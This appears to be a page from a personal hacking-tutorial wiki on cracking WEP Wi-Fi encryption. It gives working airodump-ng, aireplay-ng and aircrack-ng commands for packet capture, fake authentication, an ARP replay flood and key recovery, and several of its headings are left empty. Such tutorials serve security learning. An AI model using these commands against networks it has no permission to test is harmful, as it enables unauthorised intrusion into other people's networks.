5. Gaining Access - WEP Cracking

Basics

How Encryption works

WEP Cracking

Weakness

We can use the tool aircrack-ng to determine the keystream

To crack WEP we need to

I am assuming, you already have done Part 1 and 2 of this tutorial

1. Capture a large amount of Packages/IVs (airodump-ng)

airodump-ng --bssid 11:22:33:44:55:66 --channel 12 --write ~/wep-cap wlan0

2. Analyse the captured IVs and crack the key (aircrack-ng)

aircrack-ng wep-cap.cap

It should look something like this:

Bildschirmfoto vom 2023-02-10 20-15-05.png

If the ASCII Code isn't displayed, which will be sometimes the cast, just use the key between the brackets, while removing the colons like this: 41:73:32:33:70 -> 4173323370

Which means, the target router will accept both: As23p or 4173323370 as password

WEP Cracking

Problem:

Solution:

Fake Authentication

Problem:

APs communicate with connected clients

Solution:

1) Use airodump-ng

airodump-ng --bssid 11:22:33:44:55:66 --channel 11 --write arpreplay wlan0

2) Assosiate with AP

aireplay-ng --fakeauth 0 -a 11:22:33:44:55:66 -h 48:5D:60:2A:45:25 wlan0

The MAC Adress 48:5D:60:2A:45:25 is an example for your wireless adapter's MAC Adress. You can get the MAC by typing:

ifconfig

Bildschirmfoto vom 2023-02-10 20-56-14.png

Just use the first 12 chars and replace the minus with colums

After Running aireplay-ng the Option AUTH should be OPN and a new Station should appear. The Station should be your Adapters MAC Address

Bildschirmfoto vom 2023-02-10 20-59-21.png

This means, you are associated but not connected to the network. Which means you can now communicate with the AP. If you send anything to this network it will now accept it, even when not connected to the Network.

ARP Request Replay Attack

Problem

Solution

This is the most reliable and easy method

1) Use airodump-ng

 airodump-ng --bssid 11:22:33:44:55:66 --channel 11 --write arpreplay wlan0

2) Associate with the AP

aireplay-ng --fakeauth 0 -a 11:22:33:44:55:66 -h 48:5D:60:2A:45:25 wlan0

3) ARP Request Replay Attack

aireplay-ng -- arpreplay -b 11:22:33:44:55:66 -h 48:5D:60:2A:45:25 wlan0

Now it will flood the Access Point with packages to generate IV's

4) Now associate another time with the AccessPoint

aireplay-ng --fakeauth 0 -a 11:22:33:44:55:66 -h 48:5D:60:2A:45:25 wlan0

5) And run aircrack-ng

aircrack-ng arpreplay-01.cap

For easier layout, use Terminator as terminal, so you can split the terminal and have various commandlines open or use a terminal Multiplexer like tmux. I'd recommand to run 1) 3) and 5) at the same time.


Revision #9
Created 10 February 2023 18:33:46 by tinfoil-hat
Updated 9 March 2023 18:06:05 by tinfoil-hat